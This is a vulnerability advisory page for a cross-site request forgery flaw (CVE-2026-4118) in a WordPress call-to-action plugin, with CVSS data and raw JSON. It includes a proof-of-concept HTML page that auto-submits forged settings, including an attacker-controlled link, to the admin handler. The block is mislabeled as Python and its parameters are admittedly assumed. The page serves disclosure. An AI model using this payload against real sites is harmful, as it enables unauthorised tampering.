Security Vulnerability Report
中文
CVE-2026-4118 CVSS 4.3 MEDIUM

CVE-2026-4118

Published: 2026-04-22 09:16:23
Last Modified: 2026-04-22 20:22:51
Source: [email protected]

Description

The Call To Action Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.3. This is due to missing nonce validation in the cbox_options_page() function which handles saving, creating, and deleting plugin settings. The form rendered on the settings page does not include a wp_nonce_field(), and the save handler does not call wp_verify_nonce() or check_admin_referer() before processing settings updates via $wpdb->update(). This makes it possible for unauthenticated attackers to modify plugin settings such as call-to-action box title, content, link URL, image URL, colors, and other configuration options via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Call To Action Plugin <= 3.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Proof of Concept for CVE-2026-4118 --> <!-- This HTML page demonstrates the CSRF vulnerability by auto-submitting a form. --> <!-- The target administrator must be logged in for the request to succeed. --> <html> <body> <h2>CSRF Exploit Demo</h2> <p>This page attempts to update plugin settings via a forged request.</p> <!-- Assuming the action URL points to the plugin's options page handler --> <form action="http://target-site/wp-admin/admin.php?page=cbox_options_page" method="POST"> <!-- Malicious payload to change settings --> <input type="hidden" name="cbox_title" value="Hacked by CSRF" /> <input type="hidden" name="cbox_content" value="Click here for malicious link" /> <input type="hidden" name="cbox_link" value="http://attacker-controlled-site.com" /> <input type="hidden" name="cbox_image" value="http://attacker-controlled-site.com/image.jpg" /> <input type="hidden" name="cbox_color" value="#FF0000" /> <input type="hidden" name="action" value="save" /> <input type="submit" value="Submit Request" /> </form> <script> // Automatically trigger the exploit when the page loads document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4118", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:23.180", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Call To Action Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.3. This is due to missing nonce validation in the cbox_options_page() function which handles saving, creating, and deleting plugin settings. The form rendered on the settings page does not include a wp_nonce_field(), and the save handler does not call wp_verify_nonce() or check_admin_referer() before processing settings updates via $wpdb->update(). This makes it possible for unauthenticated attackers to modify plugin settings such as call-to-action box title, content, link URL, image URL, colors, and other configuration options via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L55", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L69", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/tags/3.1.3/call-to-action-plugin.php#L76", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L41", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L55", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L69", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/call-to-action-plugin/trunk/call-to-action-plugin.php#L76", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6d15f5de-9ec9-466d-aafe-6304356ccb39?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.